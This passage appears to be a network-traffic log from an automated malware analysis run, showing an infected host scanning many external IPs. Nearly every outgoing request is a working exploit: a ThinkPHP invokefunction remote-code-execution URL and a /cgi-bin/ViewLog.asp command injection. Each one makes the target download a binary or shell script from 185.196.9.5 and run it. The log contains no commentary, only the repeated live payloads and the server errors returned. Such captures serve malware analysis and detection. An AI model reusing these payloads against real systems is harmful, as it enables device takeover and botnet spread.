Feb 25, 2024 19:04:19.941576958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.15	49816	112.168.70.180	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:44.906970024 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:45.196352005 CET	280	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 113 Connection: close Date: Sun, 25 Feb 2024 18:02:45 GMT Server: lighttpd/1.4.26 Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.15	39338	112.160.97.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:44.907416105 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.15	38516	94.182.124.118	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.195218086 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.15	55148	112.163.41.248	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.198154926 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:45.490817070 CET	339	IN	HTTP/1.0 400 Bad Request Date: Sun, 25 Feb 2024 18:02:41 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.15	35616	112.166.148.193	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.199609041 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.15	45194	112.222.219.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.212371111 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:45.519000053 CET	839	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:45 GMT Accept-Ranges: bytes Connection: close Content-Length: 675 Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 30 64 30 64 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 20 7d 0a 64 69 76 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 34 70 78 3b 20 77 69 64 74 68 3a 35 30 30 70 78 3b 20 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 61 75 74 6f 20 30 3b 20 70 61 64 64 69 6e 67 3a 35 30 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 30 38 30 38 30 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 38 70 78 20 31 35 70 78 20 32 30 70 78 20 23 34 30 34 30 34 30 20 7d 0a 68 31 20 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 20 7d 0a 70 20 7b 20 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 61 30 61 30 66 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 34 30 30 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>400 - Bad Request</title><style type="text/css">body { background-color:#d0d0d0; font-family:sans-serif }div { background-color:#f8f8f8; letter-spacing:4px; width:500px; margin:100px auto 0; padding:50px; border-radius:10px; border:1px solid #808080; box-shadow:8px 15px 20px #404040 }h1 { margin:0; font-size:22px; font-weight:normal }p { margin:10px 0 0 0; padding-top:2px; font-size:14px; color:#606060; border-top:1px solid #a0a0ff; text-align:right; font-weight:bold }</style></head><body><div><h1>Bad Request</h1><p>400</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.15	38884	94.23.198.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.368647099 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:45.542016983 CET	323	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:02:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.15	52144	94.123.43.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.422044992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.15	49064	95.86.91.183	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.425326109 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:46.159719944 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.15	38346	94.67.238.116	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.429404020 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:45.665096045 CET	388	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 20:02:43 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.15	52220	95.112.90.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.546502113 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:45.745058060 CET	548	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:43 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.15	60232	62.29.99.142	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.571813107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.15	52212	31.44.141.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:45.891304970 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.15	40794	94.3.23.152	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:46.081032038 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.15	59026	94.120.1.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:46.122062922 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.15	45732	112.31.148.231	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:46.937025070 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:47.340146065 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:47 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.15	58634	88.221.213.164	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:47.123310089 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:47.309756041 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:47 GMT Date: Sun, 25 Feb 2024 18:02:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 64 35 64 64 35 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 36 37 26 23 34 36 3b 31 32 62 37 36 36 64 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a4d5dd58.1708884167.12b766dd</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.15	50368	94.187.103.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:47.904304981 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.15	43882	94.120.255.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:47.911612034 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.15	54818	31.34.253.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:48.082591057 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
